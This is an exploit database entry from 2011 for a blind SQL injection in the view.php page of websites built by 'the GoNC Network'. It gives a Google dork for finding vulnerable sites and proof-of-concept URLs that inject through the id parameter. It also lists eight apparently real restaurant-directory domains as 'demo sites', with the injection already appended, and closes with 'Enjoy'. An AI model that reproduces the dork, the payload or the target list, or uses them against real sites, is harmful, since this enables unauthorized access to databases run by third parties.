the GoNC Network(view.php)Blind Sql Injection Vulnerability

2011-08-16T00:00:00
ID 1337DAY-ID-16686
Type zdt
Reporter Angel Injection
Modified 2011-08-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:the GoNC Network(view.php)Blind Sql Injection Vulnerability
# Date: 16/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc ,http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: http://www.gowilkes.com/services/webdesign/
# Version: N/A
# Category:: webapps
# Google dork: intext:"Web Design by the GoNC Network" inurl:"view.php?id="
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit

http://localhost/[path]/view.php?id=1'
http://localhost/[path]/view.php?id=1[blind here]
><><><><><><><><><><><><><><><><><><><><><><><>><>
demo sites
http://www.gowatauga.com/restaurants/view.php?id=1%27
http://www.gosurry.com/restaurants/view.php?id=1%27
http://www.goyadkin.com/restaurants/view.php?id=1%27
http://www.goalleghany.com/restaurants/view.php?id=1%27
http://www.goiredell.com/restaurants/view.php?id=1%27
http://www.gobertie.com/restaurants/view.php?id=1%27
http://www.goashe.com/restaurants/view.php?id=1%27
http://www.gocatawba.com/restaurants/view.php?id=1%27



Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2016-04-19]  #